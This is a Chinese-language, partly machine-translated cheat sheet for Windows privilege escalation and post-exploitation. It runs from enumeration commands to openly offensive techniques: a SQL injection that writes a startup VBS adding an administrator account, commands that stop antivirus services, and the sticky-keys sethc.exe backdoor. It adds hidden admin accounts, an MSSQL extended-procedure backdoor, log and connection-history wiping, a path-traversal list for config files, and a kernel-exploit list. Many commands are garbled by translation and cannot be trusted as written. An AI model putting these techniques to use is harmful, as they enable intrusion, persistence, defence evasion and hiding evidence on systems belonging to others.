提权思路
介绍
窗户提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。
所以本指南主要集中在枚举方面。
注:我不是专家,仍然在学习当中。
指南概述
在每个部分中,我首先提供老的可靠的CMD命令,然后是一个PowerShell的实现的的等价命令。同时拥有这两种工具是非常好的,Powershell的比传统的CMD更加灵活。然而,没有一个的powershell命令能等价于所有东西(或者CMD在某些事情上仍然更简单更好),所以一些部分将只包含常规的CMD命令。
命令了解操作系统类型和架构?它是否缺少任何补丁?
系统信息
wmic qfe
环境变量有什么有趣的地方吗?域控制器在LOGONSERVER?
组
Get-ChildItem环境:| ft Key,Value
有没有其他连接的驱动器?
净使用
wmic logicaldisk获取标题,描述,providername
Get-PSDrive | 其中{$ _。Provider -like“Microsoft.PowerShell.Core \ FileSystem”} | ft Name,Root
用户,你是谁?
我是谁
echo%USERNAME%
$ ENV:用户名
系统上有哪些用户?任何旧的用户配置文件没有被清理掉?
净用户
dir / b / ad“C:\ Users \”
dir / b / ad“C:\ Documents and Settings \”#Windows XP及以下版本
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\ Users -Force | 选择名称
是否有其他人登录?
qwinsta
系统上有哪些用户组?
净本地组
Get-LocalGroup | ft名称
在管理员组中有哪些用户?
net localgroup管理员
Get-LocalGroupMember管理员| ft Name,PrincipalSource
用户自动登录对应的注册表中有些什么内容?
reg查询“HKLM \ SOFTWARE \ Microsoft \ Windows NT \ Currentversion \ Winlogon”2> nul | findstr“DefaultUserName DefaultDomainName DefaultPassword”
Get-ItemProperty -Path'Registry :: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ WinLogon'| 选择“默认*”
凭证经理中有什么有趣的东西?
cmdkey / list
我们可以访问SAM和SYSTEM文件吗?
%SYSTEMROOT%\维修\ SAM
%SYSTEMROOT%\ system32 \设置\ Regback文件\ SAM
%SYSTEMROOT%\ system32 \设置\ SAM
%SYSTEMROOT%\修复\系统
%SYSTEMROOT%\ system32 \设置\ SYSTEM
%SYSTEMROOT%\ system32 \设置\ Regback文件\系统
程序,进程和服务,系统都安装了些什么软件?
dir / a“C:\ Program Files”
dir / a“C:\ Program Files(x86)”
reg查询HKEY_LOCAL_MACHINE \ SOFTWARE
Get-ChildItem'C:\ Program Files','C:\ Program Files(x86)'| ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry :: HKEY_LOCAL_MACHINE \ SOFTWARE | ft名称
有没有权限设置的比较脆弱的文件夹或文件的权限?
在程序文件夹中(Program Folders)有哪些文件或文件夹赋予了所有人(Everyone)或用户(User)的完全权限?
icacls“C:\ Program Files \ *”2> nul | findstr“(F)”| findstr“Everyone”
icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(F)”| findstr“Everyone”
icacls“C:\ Program Files \ *”2> nul | findstr“(F)”| findstr“BUILTIN \ Users”
icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(F)”| findstr“BUILTIN \ Users”
修改程序文件夹(Program Folders)中的所有人(Everyone)或用户(User)的权限?
icacls“C:\ Program Files \ *”2> nul | findstr“(M)”| findstr“Everyone”
icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(M)”| findstr“Everyone”
icacls“C:\ Program Files \ *”2> nul | findstr“(M)”| findstr“BUILTIN \ Users”
icacls“C:\ Program Files(x86)\ *”2> nul | findstr“(M)”| findstr“BUILTIN \ Users”
Get-ChildItem'C:\ Program Files \ *','C:\ Program Files(x86)\ *'| %{try {Get-Acl $ _ -EA SilentlyContinue | 其中{($ _.Access | select -ExpandProperty IdentityReference)-match'Everyone'}} catch {}}
Get-ChildItem'C:\ Program Files \ *','C:\ Program Files(x86)\ *'| %{try {Get-Acl $ _ -EA SilentlyContinue | 其中{($ _.Access | select -ExpandProperty IdentityReference)-match'BUILTIN \ Users'}} catch {}}
你也可以上传的Sysinternals中的的AccessChk来检查可写文件夹和文件。
accesschk.exe -qwsu“Everyone”*
accesschk.exe -qwsu“Authenticated Users”*
accesschk.exe -qwsu“用户”*
系统上正在运行的进程/服务有哪些?有没有暴露的内部服务?如果是这样,我们可以打开它吗?请参阅附录中的端口转发。
任务列表/ svc
任务清单/ v
净开始
sc查询
Get-Process | ft ProcessName,Id
GET-服务
是否存在任何脆弱的服务权限?我们可以重新配置什么吗?你可以再次上传的AccessChk来检查权限。
accesschk.exe -uwcqv“Everyone”*
accesschk.exe -uwcqv“Authenticated Users”*
accesschk.exe -uwcqv“用户”*
有没有引用的服务路径?
wmic service get name,displayname,pathname,startmode 2> nul | findstr / i“Auto”2> nul | findstr / i / v“C:\ Windows \\”2> nul | findstr / i / v“”“
是否设置了计划任务?任何自定义实现的计划任务?
schtasks / query / fo列表2> nul | findstr TaskName
dir C:\ windows \ tasks
Get-ScheduledTask | ft TaskName,State
系统启动时都运行了些什么?
wmic startup get caption,command
reg query HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
reg query HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
reg查询HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Run
reg查询HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce
目录“C:\ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup”
目录“C:\ Documents and Settings \%username%\ Start Menu \ Programs \ Startup”
Get-CimInstance Win32_StartupCommand | 选择名称,命令,位置,用户| FL
Get-ItemProperty -Path'Registry :: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run'
Get-ItemProperty -Path'Registry :: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce'
Get-ItemProperty -Path'Registry :: HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run'
Get-ItemProperty -Path'Registry :: HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnce'
Get-ChildItem“C:\ Users \ All Users \ Start Menu \ Programs \ Startup”
Get-ChildItem“C:\ Users \ $ env:USERNAME \ Start Menu \ Programs \ Startup”
AlwaysInstallElevated是否启用?我没有跑过这个,但没有伤害检查。
reg query HKCU \ SOFTWARE \ Policies \ Microsoft \ Windows \ Installer / v AlwaysInstallElevated
网络连接到了哪一块网卡?是否有多个网络?
ipconfig / all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
我们有哪些网络路线?
路线打印
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP缓存中有什么?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
是否有连接到其他主机的网络连接?
netstat -ano
主机文件中的有什么东西?
C:\ WINDOWS \ SYSTEM32 \ DRIVERS \ ETC \主机
防火墙是否打开?如果是又是怎样配置的?
netsh防火墙显示状态
netsh防火墙显示配置
netsh advfirewall防火墙显示规则名称=全部
netsh advfirewall export“firewall.txt”
任何其他有趣的接口配置?
netsh转储
有没有SNMP配置?
reg查询HKLM \ SYSTEM \ CurrentControlSet \ Services \ SNMP / s
Get-ChildItem -path HKLM:\ SYSTEM \ CurrentControlSet \ Services \ SNMP -Recurse
有趣的文件和敏感信息
这部分内容的命令输出可能有点杂乱,所以你可能想把命令的输出重定向到TXT文件中进行审查和解析。
在注册表中是否有任何密码?
reg查询HKCU / f密码/ t REG_SZ / s
reg查询HKLM / f密码/ t REG_SZ / s
查看是否存在没有清理掉的系统预备或无人值守的文件?
dir / s * sysprep.inf * sysprep.xml * unattended.xml * unattend.xml * unattend.txt 2> nul
Get-Childitem -Path C:\ -Include * unattend *,* sysprep * -File -Recurse -ErrorAction SilentlyContinue | 其中{($ _。Name -like“* .xml”-or $ _。Name -like“* .txt”-or $ _。Name -like“* .ini”)}
如果服务器是IIS网络服务器,那么的Inetpub中有什么?以及任何隐藏的目录?的web.config文件?
dir / a C:\ inetpub \
dir / s web.config
C:\ WINDOWS \ SYSTEM32 \ INETSRV \设置\的applicationHost.config
Get-Childitem -Path C:\ inetpub \ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
在IIS日志目录中有些什么文件?
C:\的Inetpub \日志\ LogFiles文件\ W3SVC1 \ u_ex [YYMMDD]的.log
C:\的Inetpub \日志\ LogFiles文件\ W3SVC2 \ u_ex [YYMMDD]的.log
C:\的Inetpub \日志\ LogFiles文件\ FTPSVC1 \ u_ex [YYMMDD]的.log
C:\的Inetpub \日志\ LogFiles文件\ FTPSVC2 \ u_ex [YYMMDD]的.log
是否安装了XAMPP,阿帕奇或PHP?任何有XAMPP,阿帕奇或PHP配置文件?
dir / s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
系统中是否存在任何的Apache网络日志?
dir / s access.log error.log
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
系统中是否任何有趣的文件?可能在用户目录(桌面,文档等)?
dir / s * pass * == * vnc * == * .config * 2> nulGet-Childitem -Path C:\ Users \ -Include * password *,* vnc *,*。config -File -Recurse -ErrorAction SilentlyContinue
系统中是否有包含密码的文件?
findstr / si密码* .xml * .ini * .txt * .config 2> nul
Get-ChildItem C:\ * -include * .xml,*。ini,* .txt,*。config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern“密码”
cmd下操作VPN相关知识,资料:
#允许管理员拨入该VPN:
netsh ras设置用户管理员许可
#禁止管理员拨入该VPN:
netsh ras设置用户管理员拒绝
#查看哪些用户可以拨入VPN:
netsh ras show user
#查看VPN分配IP的方式:
netsh ras ip show config
#使用地址池的方式分配IP:
netsh ras ip set addrassign method = pool
#地址池的范围是从192.168.3.1到192.168.3.254:
netsh ras ip add from = 192.168.3.1 to = 192.168.3.254
Cmd,Dos命令行下添加SQL用户的方法:
需要有管理员权限,在命令下先建立一个“C:\ test.qry”文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember'test,'sysadmin'
然后在DOS下执行:cmd.exe / c isql -E / U alma / P /ic:\ test.qry
另类的加用户方法:
在删掉了net.exe和不用adsi之外,新的加用户的方法。代码如下:
JS:
var o = new ActiveXObject(“Shell.Users”);
z = o.create(“test”);
z.changePassword( “123456”, “”)
z.setting( “ACCOUNTTYPE”)= 3;
VBS:
查看源
设置o = CreateObject(“Shell.Users”)
设置z = o.create(“test”)
z.changePassword“123456”,“”
z.setting( “ACCOUNTTYPE”)= 3
Cmd访问控制权限控制:
命令如下:
cacls c:/ e / t / g大家:F #c盘大家权限
cacls“目录”/ d大家#everyone不可读,包括管理员
备注:
反制方法,在文件夹安全设置里将Everyone设定为不可读,如果没有安全性选项:工具 - 文件夹选项 - 使用简单的共享去掉即可。
3389相关,以下配合PR更好:
a,防火墙TCP / IP筛选。(关闭:net stop policyagent&net stop sharedaccess)
B,内网环境(lcx.exe)
c,终端服务器超出了最大允许连接(XP运行:mstsc / admin; 2003运行:mstsc / console)
1.查询终端端口:
REG查询HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server \ WinStations \ RDP-Tcp / v PortNumber
2.开启XP和2003终端服务:
REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server / v fDenyTSConnections / t REG_DWORD / d 00000000 / f
3.更改终端端口为2008(十六进制为:0x7d8):
REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server \ Wds \ rdpwd \ Tds \ tcp / v PortNumber / t REG_DWORD / d 0x7d8 / f
REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal“”Server \ WinStations \ RDP-Tcp / v PortNumber / t REG_DWORD / d 0x7D8 / f
4.取消XP和2003系统防火墙对终端服务的限制及IP连接的限制:
REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Services \ SharedAccess \ Parameters \ FirewallPolicy \ StandardProfile \ GloballyOpenPorts \ List / v 3389:TCP / t REG_SZ / d 3389:TCP:*:启用:@ xpsp2res.dll,-22009 / f
创建表a(cmd文本);
插入值(“set wshshell = createobject(”“wscript.shell”“)”);
插入值(“a = wshshell.run(”“cmd.exe / c net user admin admin / add”“,0)”);
插入值(“b = wshshell.run(”“cmd.exe / c net localgroup administrators admin / add”“,0)”);
select * from a into outfile“C:\\ Documents and Settings \\ All Users \\”开始“菜单\\程序\\启动\\ a.vbs”;
BS马的的PortMap功能,类似LCX做转发若果支持ASPX,用这个转发会隐蔽点(注:一直忽略了在偏僻角落的那个功能)。
关闭常见杀软(把杀软所在的文件的所有权限去掉):
处理变态诺顿企业版:
net stop“Symantec AntiVirus”/ y
net stop“Symantec AntiVirus定义观察器”/ y
net stop“赛门铁克赛事经理”/ y
净停止“系统事件通知”/ y
net stop“Symantec Settings Manager”/ y
麦咖啡:
网络停止“McAfee McShield”
赛门铁克病毒日志:
C:\ Documents and Settings \ All Users \ Application Data \ Symantec \ Symantec Endpoint Protection \ Logs
赛门铁克病毒备份:
C:\ Documents and Settings \ All Users \ Application Data \ Symantec \ Symantec Endpoint Protection \ Quarantine
NOD32病毒备份:
C:\ Docume~1 \ Administrator \ Local Settings \ Application Data \ ESET \ ESET NOD32 Antivirus \ Quarantine
NOD32移除密码保护:
删除“HKEY_LOCAL_MACHINE \ SOFTWARE \ ESET \ ESET Security \ CurrentVersion \ Info \ PackageID”即可
安装5次移位后门,沾滞键后门,替换SHIFT后门:
5次SHIFT,沾滞键后门:
复制%systemroot%\ system32 \ sethc.exe%systemroot%\ system32 \ dllcache \ sethc1.exe
复制%systemroot%\ system32 \ cmd.exe%systemroot%\ system32 \ dllcache \ sethc.exe / y
复制%systemroot%\ system32 \ cmd.exe%systemroot%\ system32 \ sethc.exe / y
替换SHIFT后门:
attrib c:\ windows \ system32 \ sethc.exe -h -r -s
attrib c:\ windows \ system32 \ dllcache \ sethc.exe -h -r -s
del c:\ windows \ system32 \ sethc.exe
复制c:\ windows \ explorer.exe c:\ windows \ system32 \ sethc.exe
复制c:\ windows \ system32 \ sethc.exe c:\ windows \ system32 \ dllcache \ sethc.exe
attrib c:\ windows \ system32 \ sethc.exe + h + r + s
attrib c:\ windows \ system32 \ dllcache \ sethc.exe + h + r + s
添加隐藏系统账号:
如图1所示,执行命令:
“net user admin $ 123456 / add&net localgroup administrators admin $ / add”。
2,导出注册表SAM下用户的两个键值。
3,在用户管理界面里的admin $删除,然后把备份的注册表导回去。
4,利用黑客后卫把相关用户注册表隐藏。
安装MSSQL扩展后门:
使用主人;
EXEC sp_addextendedproc'xp_helpsystem','xp_helpsystem.dll';
GRANT exec在xp_helpsystem上公开;
处理服务器MSFTP日志:
在“C:\ WINNT \ system32 \ LogFiles \ MSFTPSVC1 \”下有ex011120.log / ex011121.log / ex011124.log三个文件,直接删除ex0111124.log不成功,显示“原文件......正在使用”。
当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。
当停止“MSFTPSVC”服务后可直接删除“ex011124.log”。
MSSQL查询分析器连接记录清除:
MSSQL 2000位于注册表如下:
HKEY_CURRENT_USER \ Software \ Microsoft \ Microsoft SQL Server \ 80 \ Tools \ Client \ PrefServers
找到接接过的信息删除。
MSSQL 2005是在:
C:\ Documents and Settings \\ Application Data \ Microsoft \ Microsoft SQL Server \ 90 \ Tools \ Shell \ mru.dat
各种网站的配置文件相对路径大全:
/config.php
../../config.php
../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
../../../conn.asp
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
../../data/conn.asp
../data/conn.asp
../../../data/conn.asp
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
的index.php
./index.php
../../index.php
../index.php
../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp
大牛总结的窗口提权精通合集
漏洞列表
#Security Bulletin #KB #Description #Operating System
CVE-2017-0213 [Windows COM特权提升漏洞](Windows 10 / 8.1 / 7/2016 / 2010/2008)
MS17-010 [KB4013389] [Windows内核模式驱动程序](Windows 7/2008/2003 / XP)
MS16-135 [KB3199135] [Windows内核模式驱动程序](2016)
MS16-098 [KB3178466] [内核驱动程序](Win 8.1)
MS16-075 [KB3164038] [Hot Potato](2003/2008/7/8/2012)
MS16-032 [KB3143141] [二次登录处理](2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV](2008 / Vista / 7)
MS15-097 [KB3089656] [远程执行代码](win8.1 / 2012)
MS15-076 [KB3067505] [RPC](2003/2008/7/8/2012)
MS15-077 [KB3077657] [ATM](XP / Vista / Win7 / Win8 / 2000/2003/2008 / 2012)
MS15-061 [KB3057839] [内核驱动程序](2003/2008/7/8/2012)
MS15-051 [KB3057191] [Windows内核模式驱动程序](2003/2008/7/8/2012)
MS15-010 [KB3036220] [内核驱动程序](2003/2008/7/8)
MS15-015 [KB3031432] [内核驱动程序](Win7 / 8 / 8.1 / 2012 / RT / 2012 R2 / 2008 R2)
MS15-001 [KB3023266] [内核驱动程序](2008/2012/7/8)
MS14-070 [KB2989935] [内核驱动程序](2003)
MS14-068 [KB3011780] [域名特权升级](2003/2008/2012/7/8)
MS14-058 [KB3000061] [Win32k.sys](2003/2008/2012/7/8)
MS14-040 [KB2975684] [AFD驱动程序](2003/2008/2012/7/8)
MS14-002 [KB2914368] [NDProxy](2003 / XP)
MS13-053 [KB2850851] [win32k.sys](XP / Vista / 2003/2008 / win 7)
MS13-046 [KB2840221] [dxgkrnl.sys](Vista / 2003/2008 / 2012/7)
MS13-005 [KB2778930] [内核模式驱动程序](2003/2008 / 2012 / win7 / 8)
MS12-042 [KB2972621] [服务总线](2008/2012 / win7)
MS12-020 [KB2671387] [RDP](2003/2008/7 / XP)
MS11-080 [KB2592799] [AFD.sys](2003 / XP)
MS11-062 [KB2566454] [NDISTAPI](2003 / XP)
MS11-046 [KB2503665] [AFD.sys](2003/2008/7 / XP)
MS11-011 [KB2393802] [内核驱动程序](2003/2008/7 / XP / Vista)
MS10-092 [KB2305420] [任务计划程序](2008/7)
MS10-065 [KB2267960] [FastCGI](IIS 5.1,6.0,7.0和7.5)
MS10-059 [KB982799] [ACL-Churraskito](2008/7 / Vista)
MS10-048 [KB2160329] [win32k.sys](XP SP2和SP3 / 2003 SP2 / Vista SP1和SP2 / 2008 Gold&SP2&R2 / Win7)
MS10-015 [KB977165] [KiTrap0D](2003/2008/7 / XP)
MS09-050 ??[KB975517] [远程执行代码](2008 / Vista)
MS09-020 [KB970483] [IIS 6.0](IIS 5.1和6.0)
MS09-012 [KB959454] [Chimichurri](Vista / win7 / 2008 / Vista)
MS08-068 [KB957097] [远程执行代码](2000 / XP)
MS08-067 [KB958644] [远程执行代码](Windows 2000 / XP / Server 2003 / Vista / Server 2008)
MS08-025 [KB941693] [Win32.sys](XP / 2003/2008 / Vista)
MS06-040 [KB921883] [远程执行代码](2003 / xp / 2000)
MS05-039 [KB899588] [PnP服务](Win 9X / ME / NT / 2000 / XP / 2003)
MS03-026 [KB823980] [RPC接口中的缓冲区溢出](/ NT / 2000 / XP / 2003)
项目下载地址; https://github.com/SecWiki/windows-kernel-exploits